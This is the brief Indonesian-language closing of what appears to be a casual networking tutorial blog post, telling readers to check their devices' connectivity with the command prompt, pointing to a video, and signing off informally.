Setelah semua langkah di atas di lakukan cek semua perangkat menggunakan command prompt, dan seharusnya semua sudah reply atau terhubung dengan sempurna.
Untuk Lebih Jelasnya Silahkan Lihat Video [ Klik Disini ] Maaf Juga Videonya W Potong Potong Karena Laptop w gak kuat lama buat Ngerekam Vidonya
OKeee Mungkin Itu Saja Dari Aku Kak :V
Thx Onii-Chan >//<
